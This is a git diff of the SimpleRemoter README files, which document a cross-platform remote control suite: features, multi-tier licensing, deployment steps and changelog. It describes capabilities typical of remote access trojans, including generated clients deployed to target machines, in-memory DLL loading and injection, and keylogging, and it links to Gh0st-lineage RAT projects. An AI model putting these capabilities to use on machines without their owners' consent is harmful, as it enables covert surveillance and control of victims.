uint64_t nameLength; // 文件名长度
uint16_t flags; // 标志位 (FFV2_LAST_CHUNK 等)
uint16_t checksum; // CRC16 校验(可选)
uint8_t reserved[8]; // 预留扩展
// char filename[nameLength]; // UTF-8 相对路径
// uint8_t data[dataLength]; // 文件数据
};
```
**特性** | 功能 | 状态 | 实现 |
- 大文件支持uint64_t 突破 4GB 限制) |---|---|---|
- 断点续传(状态持久化到 `%TEMP%\FileTransfer\` | 远程桌面 | ✅ | CGDisplayStream + VideoToolbox H.264 硬件编码 |
- SHA-256 完整性校验 | 键鼠控制 | ✅ | CGEvent支持双击、拖拽 |
- C2C 直传(客户端到客户端) | 远程终端 | ✅ | PTY 交互式 Shellzsh/bash |
- V1/V2 协议兼容 | 文件管理 | ✅ | V2 协议、大文件 |
| 进程管理 | ✅ | proc_listpids + 终止 |
| 剪贴板同步 | ✅ | NSPasteboard支持文件 URL + NSFilenamesPboardType |
| 守护模式 | ✅ | `-d` 后台运行、电源管理、空闲检测 |
### 屏幕传输优化 **编译**`cd macos && ./build.sh`
- **SSE2 指令集**:像素差分计算硬件加速 ### Go 主控v1.3.4+
- **多线程并行**:线程池分块处理屏幕数据
- **滚动检测**:识别滚动场景,减少 50-80% 带宽
- **H.264 编码**:基于 x264GOP 控制,视频级压缩
### 安全机制 **系统要求**Go 1.21+(仅编译时);二进制运行无依赖
| 层级 | 措施 | | 能力 | 实现 |
|------|------| |---|---|
| **传输加密** | AES-256 数据加密,可配置 IV | | 远程桌面 | H.264 → WebSocket → WebCodecs1080P @ 20fps |
| **身份验证** | 签名验证 + HMAC 认证 | | 远程终端 | xterm.js + PTY/ConPTY 透明转发 |
| **授权控制** | 序列号绑定IP/域名),多级授权 | | 多用户 | Challenge-Response + 不透明 token + 按组授权 |
| **文件校验** | SHA-256 完整性验证 | | 部署 | Nginx 反代 / Let's Encrypt / systemd unit / `/etc/environment` |
| **会话隔离** | Session 0 独立处理 |
### 依赖库 **编译**`cd server/go && go build -o server_linux_amd64 ./cmd`
| 库 | 版本 | 用途 |
|----|------|------|
| zlib | 1.3.1 | 通用压缩 |
| zstd | 1.5.7 | 高速压缩 |
| x264 | 0.164 | H.264 编码 |
| libyuv | 190 | YUV 转换 |
| HPSocket | 6.0.3 | 网络 I/O |
| jsoncpp | 1.9.6 | JSON 解析 |
--- ---
## 系统架构 ## 系统架构
### 全平台拓扑
``` ```
┌───────────────────────────────────────────────────────────────────────────── ┌────────────────────────────────────────────────────────┐
多层授权架构 (Multi-Layer Authorization) 主控层
├─────────────────────────────────────────────────────────────────────────────┤ │ │
┌──────────────────┐ ┌──────────────────┐
┌─────────────────────┐ C++ MFC 主控 Go 主控 │
超级管理员 │ YAMA.exe (Win/Linux/Mac) │
│ (授权服务器) │ │ Windows only │ │ Web UI 全平台 │
│ Super Admin │ └────────┬─────────┘ └────────┬─────────┘
│ └─────────┬───────────┘ │ └────────────┼──────────────────────────┼─────────────────┘
│ │
┌──────────────┼──────────────┐ │ TCP (自定义二进制协议) │ TCP (设备) + WS (浏览器)
│ V2 授权 │ V2 授权 │ V2 授权 │ └────────┬─────────────────┘
│ (ECDSA) │ (ECDSA) │ (ECDSA)
▼ ▼ ▼ │ ┌──────────────┼──────────────┐
┌───────────┐ ┌───────────┐ ┌───────────┐
│ │ 第一层 A │ │ 第一层 B │ │ 第一层 C │ ◄── 独立运营 │ ┌─────────┐ ┌─────────┐ ┌─────────┐
│ │ Layer-1 A │ │ Layer-1 B │ │ Layer-1 C │ 完全隔离 │ Windows │ │ Linux │ │ macOS
└─────┬─────┘ └─────┬─────┘ └─────┬─────┘ │ 客户端 │ 客户端 │ │ 客户端
│ │ │ │ │ (DXGI) (X11) │ │ (CG)
│ ┌────────┴────────┐ │ ┌──────┴──────┐ │ └─────────┘ └─────────┘ └─────────┘
│ │ V1 授权 │ │ │ V1 授权 │ │
│ ▼ ▼ ▼ ▼ ▼ │
│ ┌──────────┐ ┌──────────┐ ... ┌──────────┐ ┌──────────┐ │
│ │ 下级 A1 │ │ 下级 A2 │ │ 下级 C1 │ │ 下级 C2 │ │
│ │ Master │ │ Master │ │ Master │ │ Master │ │
│ └────┬─────┘ └────┬─────┘ └────┬─────┘ └────┬─────┘ │
│ │ │ │ │ │
│ ▼ ▼ ▼ ▼ │
│ ┌─────────┐ ┌─────────┐ ┌─────────┐ ┌─────────┐ │
│ │ 客户端 │ │ 客户端 │ │ 客户端 │ │ 客户端 │ │
│ │ 10,000+ │ │ 10,000+ │ │ 10,000+ │ │ 10,000+ │ │
│ └─────────┘ └─────────┘ └─────────┘ └─────────┘ │
│ │
├─────────────────────────────────────────────────────────────────────────────┤
│ 授权类型 验证方式 特点 │
│ ───────────────────────────────────────────────────────────────────────── │
│ V2 授权 ECDSA P-256 签名 支持离线验证,下级连接数限制 │
│ V1 授权 HMAC + 在线验证 连接上级服务器验证 │
│ 试用版 在线验证 功能受限,需保持连接 │
└─────────────────────────────────────────────────────────────────────────────┘
``` ```
### 架构优势 ### 多层授权(简化视图)
| 特性 | 说明 | ```
|------|------| 超级管理员(授权服务器)
| **层级控制** | 超级用户可管理任意主控程序,支持无限层级 | │ V2 授权 (ECDSA P-256)
| **完全隔离** | 不同第一层用户的授权、数据、客户端完全隔离 |
| **独立运营** | 第一层用户可独立定价、发放授权,打造专属品牌 | 第一层主控 ──┬── 第一层主控 ──┬── 第一层主控 ◄── 独立运营 / 完全隔离
| **水平扩展** | 单 Master 支持 10,000+ 客户端,多层架构可达百万级 | │ V1 │ V1 │ V1
| **离线支持** | V2 授权支持完全离线验证,无需依赖上游服务 | ▼ ▼ ▼
下级主控 → 客户端 (10,000+) → 设备群
```
### 主控程序Server | 授权 | 验证 | 特点 |
|---|---|---|
| V2 授权 | ECDSA P-256 签名 | 离线验证,下级连接数限制 |
| V1 授权 | HMAC + 在线验证 | 连接上级服务器验证 |
| 试用版 | 在线验证 | 功能受限、连接限制(详见 [合规文档](./docs/Compliance_AntiAbuse.md) |
主控程序 **YAMA.exe** 提供图形化管理界面: 完整说明:[多层授权方案](./docs/MultiLayerLicense.md)
![主界面](./images/Yama.jpg)
- 基于 IOCP 的高性能服务端
- 客户端分组管理
- 实时状态监控RTT、地理位置、活动窗口
- 一键生成客户端
### 受控程序Client
![客户端生成](./images/TestRun.jpg)
**运行形式**
| 类型 | 说明 |
|------|------|
| `ghost.exe` | 独立可执行文件,无外部依赖 |
| `TestRun.exe` + `ServerDll.dll` | 分离加载,支持内存加载 DLL |
| Windows 服务 | 后台运行,支持锁屏控制 |
| Linux 客户端 | 跨平台支持v1.2.5+ |
| macOS 客户端 | 跨平台支持v1.3.2+ |
--- ---
@@ -364,62 +291,34 @@ struct FileChunkPacketV2 {
无需编译,下载即用: 无需编译,下载即用:
1. **下载发布版** - 从 [Releases](https://github.com/yuanyuanxiang/SimpleRemoter/releases/latest) 下载最新版本 1. **下载发布版** - 从 [Releases](https://git.simpleremoter.com/yuanyuanxiang/SimpleRemoter/releases/latest) 下载最新版本
2. **启动主控** - 运行 `YAMA.exe`,输入授权信息(见下方试用口令) 2. **启动主控** - 运行 `YAMA.exe`(或 Linux 上的 `server_linux_amd64`,输入授权信息
3. **生成客户端** - 点击工具栏「生成」按钮,配置服务器 IP 和端口 3. **生成客户端** - 工具栏「生成」配置服务器 IP 和端口
4. **部署客户端** - 将生成的客户端复制到目标机器运行 4. **部署客户端** - 复制到目标机器运行
5. **开始控制** - 客户端上线后双击即可打开远程桌面 5. **开始控制** - 客户端上线后双击远程桌面
> [!TIP] > [!TIP]
> 首次测试建议在同一台机器上运行主控和客户端,使用 `127.0.0.1` 作为服务器地址。 > 首次测试建议在同一台机器上运行主控和客户端,使用 `127.0.0.1` 作为服务器地址。
### 编译要求 ### Go 主控部署VPS
- **操作系统**Windows 10/11 或 Windows Server 2016+ 参见 [Web 远程桌面配置](./docs/WebHTTPS.md)。最小步骤:
- **开发环境**Visual Studio 2019 / 2022 / 2026
- **SDK**Windows 10 SDK (10.0.19041.0+)
### 编译步骤
```bash ```bash
# 1. 克隆代码(必须使用 git clone不要下载 zip # 1. 在 VPS 上跑 Go 主控
git clone https://github.com/yuanyuanxiang/SimpleRemoter.git nohup ./server_linux_amd64 --port 6543 --http-port 9001 > yama.log 2>&1 &
# 2. 打开解决方案 # 2. nginx 反代 9001 到 HTTPS
# 使用 VS2019+ 打开 SimpleRemoter.sln # 详见 docs/WebHTTPS.md
# 3. 选择配置 # 3. 浏览器打开 https://yourdomain.com/,登录、添加客户端
# Release | x86 或 Release | x64
# 4. 编译
# 生成 -> 生成解决方案
``` ```
**常见问题** ### 试用授权v1.2.4+
- 依赖库冲突:[#269](https://github.com/yuanyuanxiang/SimpleRemoter/issues/269)
- 非中文系统乱码:[#157](https://github.com/yuanyuanxiang/SimpleRemoter/issues/157)
- 编译器兼容性:[#171](https://github.com/yuanyuanxiang/SimpleRemoter/issues/171)
### 部署方式 提供 2 年有效期、20 并发连接、仅限内网的试用口令:
#### 内网部署
主控与客户端在同一局域网,客户端直连主控 IP:Port。
#### 外网部署FRP 穿透)
``` ```
客户端 ──> VPS (FRP Server) ──> 本地主控 (FRP Client)
```
详细配置请参考:[反向代理部署说明](./反向代理.md)
### 授权说明
自 v1.2.4 起提供试用口令2 年有效期20 并发连接,仅限内网):
```
授权方式:按计算机 IP 绑定
主控 IP127.0.0.1 主控 IP127.0.0.1
序列号12ca-17b4-9af2-2894 序列号12ca-17b4-9af2-2894
密码20260201-20280201-0020-be94-120d-20f9-919a 密码20260201-20280201-0020-be94-120d-20f9-919a
@@ -430,255 +329,135 @@ git clone https://github.com/yuanyuanxiang/SimpleRemoter.git
> [!NOTE] > [!NOTE]
> **多层授权方案** > **多层授权方案**
> >
> SimpleRemoter 采用企业级多层授权架构,支持代理商/开发者独立运营: > 支持代理商/开发者独立运营:第一层用户获得授权后可完全离线使用,下级用户只连接到您的服务器。完整说明:[多层授权方案](./docs/MultiLayerLicense.md)
> - **离线验证**:第一层用户获得授权后可完全离线使用
> - **独立控制**:您的下级用户只连接到您的服务器,数据完全由您掌控 ### 编译
> - **自由定制**:支持二次开发,打造您的专属版本
> - **C++ 主控 & Windows 客户端**VS 2019/2022/2026 打开 `SimpleRemoter.sln` → Release | x64
> 📖 **[查看完整授权方案说明](./docs/MultiLayerLicense.md)** - **Linux 客户端**`cd linux && cmake . && make`
- **macOS 客户端**`cd macos && ./build.sh`
- **Go 主控**`cd server/go && go build ./cmd`
--- ---
## 用户文档 ## 用户文档
针对不同用户角色提供完整的使用文档: | 文档 | 适用对象 | 内容 |
|---|---|---|
| 文档 | 适用对象 | 内容简介 | | 📖 [快速部署指南](./docs/QuickStart.md) | 首次使用者 | 10 分钟首次部署 |
|------|---------|---------| | 📖 [多级网络搭建指南](./docs/NetworkSetup.md) | 需要管理下级的用户 | 多级网络架构 |
| 📖 [快速部署指南](./docs/QuickStart.md) | 首次使用者 | 10 分钟完成首次部署,导入授权、配置网络、生成受管程序 | | 📖 [日常使用手册](./docs/UserManual.md) | 所有用户 | 全功能详解 |
| 📖 [多级网络搭建指南](./docs/NetworkSetup.md) | 需要管理下级的用户 | 构建总控→二级→受管端的多级网络架构 | | 📖 [代理商运营手册](./docs/AgentManual.md) | 代理商/分销商 | 下级授权、FRP 配置 |
| 📖 [日常使用手册](./docs/UserManual.md) | 所有用户 | 远程桌面、文件管理、终端、进程管理等功能详解 | | 📖 [定制化开发指南](./docs/CustomizationGuide.md) | 技术型客户 | 品牌定制、二次开发 |
| 📖 [代理商运营手册](./docs/AgentManual.md) | 代理商/分销商 | 下级授权管理、FRP 代理服务配置 | | 📖 [Web 远程桌面配置](./docs/WebHTTPS.md) | 移动端 / Go 主控用户 | HTTPS 反代、域名配置 |
| 📖 [定制化开发指南](./docs/CustomizationGuide.md) | 技术型客户 | 品牌定制、界面修改、二次开发 | | 📖 [反滥用政策](./docs/Compliance_AntiAbuse.md) | 所有使用方 | 合规边界、责任划分 |
| 📖 [Web 远程桌面配置](./docs/WebHTTPS.md) | 移动端用户 | 通过浏览器访问远程桌面,支持手机/平板 | | 📖 [反滥用技术措施](./docs/Compliance_TechnicalMeasures.md) | 合规审查方 | 屏障代码位置 + 设计动机 |
---
## 客户端支持
### Windows 客户端
**系统要求**Windows 7 SP1 及以上
**功能完整性**:✅ 全部功能支持
### Linux 客户端v1.2.5+
**系统要求**
- 显示服务器X11/Xorg暂不支持 Wayland
- 必需库libX11
- 推荐库libXtstXTest 扩展、libXss空闲检测
**功能支持**
| 功能 | 状态 | 实现 |
|------|------|------|
| 远程桌面 | ✅ | X11 屏幕捕获,鼠标/键盘控制 |
| 远程终端 | ✅ | PTY 交互式 Shell |
| 文件管理 | ✅ | 双向传输,大文件支持 |
| 进程管理 | ✅ | 进程列表、终止进程 |
| 心跳/RTT | ✅ | RFC 6298 RTT 估算 |
| 守护进程 | ✅ | 双 fork 守护化 |
| 剪贴板 | ⏳ | 开发中 |
| 会话管理 | ⏳ | 开发中 |
**编译方式**
```bash
cd linux
cmake .
make
```
### macOS 客户端v1.3.2+
**系统要求**
- macOS 10.15 (Catalina) 及以上
- 需要授予系统权限:屏幕录制、辅助功能、完全磁盘访问
**功能支持**
| 功能 | 状态 | 实现 |
|------|------|------|
| 远程桌面 | ✅ | CoreGraphics 屏幕捕获H.264 硬件编码 |
| 鼠标控制 | ✅ | CGEvent 模拟,支持双击、拖拽 |
| 键盘控制 | ✅ | CGEvent 模拟,完整键码映射 |
| 光标同步 | ✅ | 实时同步远程光标样式 |
| 心跳/RTT | ✅ | RFC 6298 RTT 估算 |
| 文件管理 | ⏳ | 开发中 |
| 远程终端 | ⏳ | 开发中 |
**编译方式**
```bash
cd macos
mkdir build && cd build
cmake ..
make
```
--- ---
## 更新日志 ## 更新日志
### v1.3.5 (2026.5.31)
**硬件编码扩展H.264 / AV1& 多客户许可证生产化 & FRP 子级自动化**
**新功能:**
- **客户端硬件编码**:新增 FFmpeg 路径的 `CFFmpegH264Encoder` / `CFFmpegAV1Encoder`,可调用 NVENC / Quick Sync / AMF 等 GPU 编码器;`EncoderFactory` 运行时自动优选
- **静屏跳编码**:捕获层比对前后帧,完全相同时跳过编码与传输——硬件编码器在静屏不再被强行喂入相同帧
- **菜单驱动的压缩 / 解压**:自定义文件 + 文件夹选择器(`ZstaPickerDlg`),可从远程主机直接选混合目录树打包或解压到目标路径
- **下级主控自动起 frp client**:上级签发 V2 授权时一并下发 frp 配置,子级主控启动即接通中继链路,无需人工配 `frpc.toml`
- **合规可裁剪构建**`DISABLE_X264` / `DISABLE_FFMPEG` 编译开关,可在不动源码的前提下产出完全不带 x264 / FFmpeg 的二进制,配套 `LICENSE-THIRD-PARTY.txt`
**改进:**
- **多客户许可证服务端硬化**`licenses.ini` hot-path 互斥锁 + 30s 节流,写频从 0.6 → 0.07 次/秒(外推 100 在线:~160 → ~3.3 次/秒);闭环了"预设续期配额消失"的 read-modify-write 竞态
- **`licenses.ini` IP 列表 4KB 截断修复**:分段写入避免溢出尾部被永久丢弃
- **导入 SN 按 `BindType` 严格校验**:避免离线版 / 在线版 / 试用版 SN 串库
- **客户端 SCLoader 大瘦身**:移除一万行硬编码 stub`SCLoader.cpp`),改用主控运行时下发 DLL 注入
- **客户端 logger 优雅退出**:进程退出刷出队列里的日志并记录退出信号
- **IOCPClient 早期数据包防护**`setManagerCallBack` 之前抵达的包不再触发空回调崩溃
- **多显示器光标位置修正 & MJPEG 录制翻转修复**trace cursor 跨屏坐标系修正MJPEG 上下颠倒回放修正 + 编码失败 0 字节 AVI 残留清理
- **FRP `privilegeKey` 改用 UTC 时间戳**:跨时区主控 / 中继 / 客户端不再因本地时区让 frp auth 失效
- **Linux 客户端 `install.sh` / `uninstall.sh`**:补齐一键部署 / 卸载脚本
- **Go 服务端构建管线**`build.ps1` / `build.cmd` 把 Go 主控纳入主构建
- **Release / Download 链接全量迁移到 Gitea**v1.3.4+ 不再发到 GitHub
**Bug 修复:**
- Web 文件管理触屏双击不稳:触摸阈值放宽防误判拖拽 + 两次 `click` 模拟物理双击;修复跨平台文件夹重命名 / 点击无响应
- 向 sub-master 发送 AUTH 时密码生成路径错误,下级始终认证失败
- 试用 SN 误进入 V2 / V1 授权下发分支
### v1.3.4 (2026.5.20)
**Go 主控 & 全平台主控闭环 & Linux/macOS 客户端剪贴板**
**新功能:**
- **Go 主控**Go 语言实现的跨平台轻量主控服务Windows / Linux / macOS聚焦于"远程桌面 + 远程终端 + 多用户分级"——不替代 MFC 主控,为需要纯 Linux/macOS 落地的运维场景兜底
- **Web 远程桌面Go 主控)**H.264 → WebSocket → WebCodecs 解码、1080P @ 20fps、桌面 + 移动端全适配远程光标同步、Keyboard Lock 防 ESC/F11 误退、控制态下 F11/Esc 直传目标
- **Web 远程终端Go 主控)**xterm.js + PTY/ConPTY 透明转发、调整尺寸、断开自动清理面板
- **多用户体系Go 主控)**:管理员/普通用户分级、按设备组授权、Challenge-Response 登录、登录限流IP + 用户名)、不透明 token
- **Linux 客户端剪贴板**:基于 xclip / xsel 的双向剪贴板同步,支持 `text/uri-list` 文件路径
- **macOS 客户端剪贴板**:基于 NSPasteboard 的双向剪贴板同步,文件 URL + 旧版 API 兼容
**改进:**
- Web 会话自适应质量被 clamp 到 H264-only 等级(≥ Good避免 Ultra/HighDIFF/RGB565让浏览器无法解码
- Linux 客户端默认 `QualityLevel` 改为 `QUALITY_GOOD`(对齐 Windows/macOS不再请求服务端自适应
- 登录文本字段按客户端能力位条件解码 UTF-8 / GBK修正德文/法文等带变音符的主机名 / 地理位置乱码
- 设备列表稳定排序(按上线时间),避免每次心跳 / WS 推送都洗牌
- RDP 重置按钮接通到设备端 `CMD_RESTORE_CONSOLE`
- MFC 主控开启 Web 远控会话时不再短暂闪一下窗口OnInitDialog 会话判定上移)
**Bug 修复:**
- Web 会话从全屏点关闭后设备列表点击失灵fullscreen 子树规则,`showPage` 统一退全屏)
- 客户端突然断开后 Web 远控页面停留在 "Connected" 永不刷新(新增 `device_offline` 通知)
- 多显示器轮询导致两路屏幕子连接同时灌帧,画面在两个显示器间跳变(`BindScreenConn` 退役旧 sub-conn
- Go 主控 `ListDevices` 因 map 迭代随机化导致列表乱序
### v1.3.3 (2026.5.10)
**Linux/macOS 客户端深化 & 双层认证安全**
- 服务端身份校验Layer 1Linux/macOS 客户端 HMAC-SHA256 校验服务端身份
- 子连接认证Layer 2TOKEN_CONN_AUTH所有子连接首包签名 + clientID 钉死
- Linux 客户端H.264 硬件编码、XFixes 光标类型检测、UTF-8 协议能力位
- macOS 客户端:文件管理器、远程终端、剪贴板同步、守护进程模式
- 主控屏幕预览缩略图、区域截图、远程桌面缩放、Web 用户按组过滤
- 共享代码抽到 `common/`rtt_estimator / client_auth_state / posix_net_helpers
### v1.3.2 (2026.5.1) ### v1.3.2 (2026.5.1)
**macOS 客户端 & Web 远程桌面增强** **macOS 客户端 & Web 远程桌面增强**
**新功能:** - 全新 macOS 原生客户端屏幕捕获、H.264 编码、键鼠控制
- macOS 客户端支持:全新实现的 macOS 原生客户端支持屏幕捕获、H.264 编码、键鼠控制、系统权限管理 - Web 远程桌面光标同步
- Web 远程桌面光标同步:浏览器端实时显示远程主机光标样式 - 触发器功能、用户管理(角色权限)
- 触发器功能:支持主机上线事件触发自定义操作 - DLL 执行增强、远程桌面输入法切换
- 用户管理功能:新增角色权限管理,支持多用户分级控制
- DLL 执行增强:参数持久化存储、支持自动运行配置
- 远程桌面输入法切换:支持远程切换被控端输入语言
**改进:**
- Web 远程桌面手势优化改进双指手势识别、双击拖拽、Shift 组合键支持
**Bug 修复:**
- 修复 Web 远程桌面在 macOS 客户端上双击无法打开文件的问题
- 修复 macOS 完全磁盘访问权限检测不准确的问题
- 修复 RestoreMemDLL 因 DLL 信息大小错误导致还原失败
- 修复多个 DLL 同时执行可能因全局变量冲突而失败
- 修复鼠标双击和远程桌面切换问题
- 修复 Linux 客户端编译缺少 libzstd.a 的问题
### v1.3.1 (2026.4.15) ### v1.3.1 (2026.4.15)
**Web 远程桌面 & 多主控共享增强** **Web 远程桌面MFC 主控) & 多主控共享增强**
**新功能:** - Web 远程桌面:基于 WebSocket 实现,手机/平板浏览器访问
- Web 远程桌面:基于 WebSocket 实现,支持手机/平板通过浏览器访问远程桌面([配置指南](./docs/WebHTTPS.md) - 多显示器禁用自适应、状态栏过期日期自动更新
- 撤销共享菜单:支持撤销已共享给其他主控的客户端 - 多层授权自动更新、DLL 缓存复用
- 工具栏音频控制:远程桌面工具栏新增系统音频开关图标
**改进:**
- 多显示器禁用自适应:客户端有多个显示器时自动禁用自适应质量
- 状态栏过期日期自动更新:授权续期后状态栏立即刷新
- 减少无效离线日志:客户端不在主机列表时减少离线日志输出
- 多层授权自动更新:第二层及以下主控的授权自动同步更新
- 使用提示增强:新增多处操作提示改善用户体验
- DLL 缓存复用:将 DLL 保存到注册表,下次启动时直接复用
**Bug 修复:**
- 修复共享客户端时键盘记录可能无法正常工作的问题
### v1.3.0 (2026.4.8) ### v1.3.0 (2026.4.8)
**多层级 FRP 架构 & 品牌定制** **多层级 FRP 架构 & 品牌定制**
**新功能:** - 本地 FRPS 服务器、多层级架构自动 FRP 集成
- 本地 FRPS 服务器支持(仅 64 位):内置 FRP 服务端,简化部署 - V2 授权下级连接数限制、许可证文件导入/导出
- 多层级架构自动 FRP 集成:下级主控自动获取上级 FRP 配置 - 增强型硬件 ID (V2)、UI 品牌定制
- V2 授权下级连接数限制:支持控制下级并发连接数 - 运行时功能限制可配置
- 许可证文件导入/导出支持(.lic 格式)
- 过期授权续期支持:无需重新生成许可证
- 增强型硬件 ID (V2):解决 VPS 重复 SN 问题
- MaxDepth 控制:限制分级 Master 层级深度
- 许可证管理增强:配额支持、动态对话框、删除功能
- IP 定位 API 多提供商回退:提高定位成功率
- UI 品牌定制支持自定义程序名称、Logo、版权等
- 运行时功能限制:试用版功能限制可配置
- 输入历史下拉框:快速选择历史输入
- 生成客户端新增选项:更多自定义配置
- 支持动态修改项目链接:无需重新编译更换帮助/反馈链接
**Bug 修复:** ### 更早版本
- 修复 RebuildFilteredIndices 的 Use-after-free 崩溃
- 修复 CLock::Lock 中 IOCP 竞态条件崩溃 (#215)
- 修复崩溃保护服务清理和代理提升问题
- 修复消息日志无限增长导致的潜在崩溃
- 修复 FeatureFlags 引入后 UpperHash 字符串长度问题
- 修复客户端 SN 生成以支持 HWIDVersion 设置
**改进:** v1.2.x 系列(邮件通知、远程音频 Opus、V2 授权协议、V2 文件传输、现代 Web 终端 xterm.js、远程桌面工具栏重写、自适应质量控制、Linux 客户端初版……)及 2019 年以来的全部演进,请见 [history.md](./history.md)。
- 重构 res/ 目录结构,添加菜单图标
- 过期密码不再被自动清除
- 保持下级主控与第一层主控的连接稳定
### v1.0.2.9 (2026.3.27)
**网络安全 & 稳定性增强**
**新功能:**
- 网络配置对话框IP 白名单/黑名单管理,实时生效
- 可配置的连接限流DLL 请求限流、IP 封禁阈值可调
- IP 历史记录对话框:查看授权 IP 登录历史
- 状态栏显示 MTBF/运行时间和授权到期日期
- 代理崩溃保护5 分钟内 3 次崩溃自动切换普通模式
- 客户端搜索功能Ctrl+F 快速搜索 IP、位置、计算机名
- 自动封禁异常 IP60 秒内超过 15 次连接自动封禁 1 小时
- Proxy Protocol v2 支持FRP 代理后获取真实客户端 IP
- Linux 剪贴板同步和 V2 文件传输支持
- 右键菜单运行客户端程序
- 多层授权混淆支持
**Bug 修复:**
- 修复 OnUserOfflineMsg 竞态条件导致的崩溃
- 修复客户端请求 FRPC DLL 时 FrpcParam 丢失
- 最大数据包从 10MB 增加到 50MB
- 支持 mstsc 远程会话读取用户注册表
- 修复远程桌面最小化时剪贴板误触发
- 修复操作进程对话框时主控崩溃
- 状态栏主机数量实时更新
- Linux select() 调用前重置 timeval
- 授权码格式验证,过滤垃圾数据
**改进:**
- 增强授权检查,添加 IP 封禁提示
- 支持主控程序以用户权限运行
- 大 DLL 自动使用 TinyRun 回退方案
### v1.2.8 (2026.3.11)
**邮件通知 & 远程音频**
- 主机上线邮件通知SMTP 配置、关键词匹配、右键快捷添加)
- 远程音频播放WASAPI Loopback+ Opus 压缩24:1
- 多 FRPS 服务器同时连接支持
- 自定义光标显示和追踪
- V2 授权协议ECDSA 签名)
- 修复非中文 Windows 系统乱码问题
- Linux 客户端屏幕压缩算法优化
### v1.2.7 (2026.2.28)
**V2 文件传输协议**
- 支持 C2C客户端到客户端直接传输
- 断点续传和大文件支持(>4GB
- SHA-256 文件完整性校验
- WebView2 + xterm.js 现代终端
- Linux 文件管理支持
- 主机列表批量更新优化,减少 UI 闪烁
### v1.2.6 (2026.2.16)
**远程桌面工具栏重写**
- 状态窗口显示 RTT、帧率、分辨率
- 全屏工具栏支持 4 个位置和多显示器
- H.264 带宽优化
- 授权管理 UI 完善
### v1.2.5 (2026.2.11)
**自适应质量控制 & Linux 客户端**
- 基于 RTT 的智能质量调整
- RGB565 算法(节省 50% 带宽)
- 滚动检测优化(节省 50-80% 带宽)
- Linux 客户端初版发布
完整更新历史请查看:[history.md](./history.md)
--- ---
## 相关项目 ## 相关项目
- [HoldingHands](https://github.com/yuanyuanxiang/HoldingHands) - 全英文界面远程控制 - [HoldingHands](https://github.com/yuanyuanxiang/HoldingHands) - 全英文界面远程控制
- [BGW RAT](https://github.com/yuanyuanxiang/BGW_RAT) - 大灰狼 9.5
- [Gh0st](https://github.com/yuanyuanxiang/Gh0st) - 经典 Gh0st 实现 - [Gh0st](https://github.com/yuanyuanxiang/Gh0st) - 经典 Gh0st 实现
--- ---
@@ -690,7 +469,6 @@ make
| **QQ** | 962914132 | | **QQ** | 962914132 |
| **Telegram** | [@doge_grandfather](https://t.me/doge_grandfather) | | **Telegram** | [@doge_grandfather](https://t.me/doge_grandfather) |
| **Email** | [yuanyuanxiang163@gmail.com](mailto:yuanyuanxiang163@gmail.com) | | **Email** | [yuanyuanxiang163@gmail.com](mailto:yuanyuanxiang163@gmail.com) |
| **LinkedIn** | [wishyuanqi](https://www.linkedin.com/in/wishyuanqi) |
| **Issues** | [问题反馈](https://t.me/SimpleRemoter) | | **Issues** | [问题反馈](https://t.me/SimpleRemoter) |
| **PR** | [贡献代码](https://git.simpleremoter.com/) | | **PR** | [贡献代码](https://git.simpleremoter.com/) |

815
ReadMe_EN.md
View File

@@ -9,18 +9,18 @@
<a href="https://github.com/yuanyuanxiang/SimpleRemoter/network/members"> <a href="https://github.com/yuanyuanxiang/SimpleRemoter/network/members">
<img src="https://img.shields.io/github/forks/yuanyuanxiang/SimpleRemoter?style=flat-square&logo=github" alt="GitHub Forks"> <img src="https://img.shields.io/github/forks/yuanyuanxiang/SimpleRemoter?style=flat-square&logo=github" alt="GitHub Forks">
</a> </a>
<a href="https://github.com/yuanyuanxiang/SimpleRemoter/releases"> <a href="https://git.simpleremoter.com/yuanyuanxiang/SimpleRemoter/releases">
<img src="https://img.shields.io/github/v/release/yuanyuanxiang/SimpleRemoter?style=flat-square" alt="GitHub Release"> <img src="https://img.shields.io/gitea/v/release/yuanyuanxiang/SimpleRemoter?gitea_url=https%3A%2F%2Fgit.simpleremoter.com&style=flat-square&logo=gitea" alt="Gitea Release">
</a> </a>
<img src="https://img.shields.io/badge/platform-Windows%20%7C%20Linux%20%7C%20macOS-blue?style=flat-square" alt="Platform"> <img src="https://img.shields.io/badge/client-Windows%20%7C%20Linux%20%7C%20macOS-blue?style=flat-square" alt="Client Platforms">
<img src="https://img.shields.io/badge/language-C%2B%2B17-orange?style=flat-square&logo=cplusplus" alt="Language"> <img src="https://img.shields.io/badge/server-Windows%20%7C%20Linux%20%7C%20macOS-success?style=flat-square" alt="Server Platforms">
<img src="https://img.shields.io/badge/IDE-VS2019%2B-purple?style=flat-square&logo=visualstudio" alt="IDE"> <img src="https://img.shields.io/badge/language-C%2B%2B17%20%2F%20Go-orange?style=flat-square&logo=cplusplus" alt="Language">
<img src="https://img.shields.io/badge/license-MIT-green?style=flat-square" alt="License"> <img src="https://img.shields.io/badge/license-MIT-green?style=flat-square" alt="License">
</p> </p>
<p align="center"> <p align="center">
<a href="https://github.com/yuanyuanxiang/SimpleRemoter/releases/latest"> <a href="https://git.simpleremoter.com/yuanyuanxiang/SimpleRemoter/releases/latest">
<img src="https://img.shields.io/badge/Download-Latest%20Release-2ea44f?style=for-the-badge&logo=github" alt="Download Latest"> <img src="https://img.shields.io/badge/Download-Latest%20Release-2ea44f?style=for-the-badge&logo=gitea" alt="Download Latest">
</a> </a>
</p> </p>
@@ -29,10 +29,7 @@
> [!WARNING] > [!WARNING]
> **Important Legal Notice** > **Important Legal Notice**
> >
> This software is intended **solely for educational purposes and authorized use cases** such as: > This software is intended **solely for educational purposes and authorized use cases**: remote IT administration within your own organization, authorized penetration testing and security research, personal device management, and technical learning.
> - Remote IT administration within your own organization
> - Authorized penetration testing and security research
> - Personal device management and technical learning
> >
> **Unauthorized access to computer systems is illegal.** Users are fully responsible for compliance with all applicable laws. The developers assume no liability for misuse. > **Unauthorized access to computer systems is illegal.** Users are fully responsible for compliance with all applicable laws. The developers assume no liability for misuse.
@@ -41,12 +38,13 @@
## Table of Contents ## Table of Contents
- [Overview](#overview) - [Overview](#overview)
- [Disclaimer](#disclaimer) - [What's New: Full-Platform Loop Closed](#whats-new-full-platform-loop-closed)
- [Compliance & Anti-Abuse](#compliance--anti-abuse)
- [Features](#features) - [Features](#features)
- [Technical Highlights](#technical-highlights) - [Cross-Platform Support](#cross-platform-support)
- [Architecture](#architecture) - [Architecture](#architecture)
- [Getting Started](#getting-started) - [Getting Started](#getting-started)
- [Client Support](#client-support) - [User Documentation](#user-documentation)
- [Changelog](#changelog) - [Changelog](#changelog)
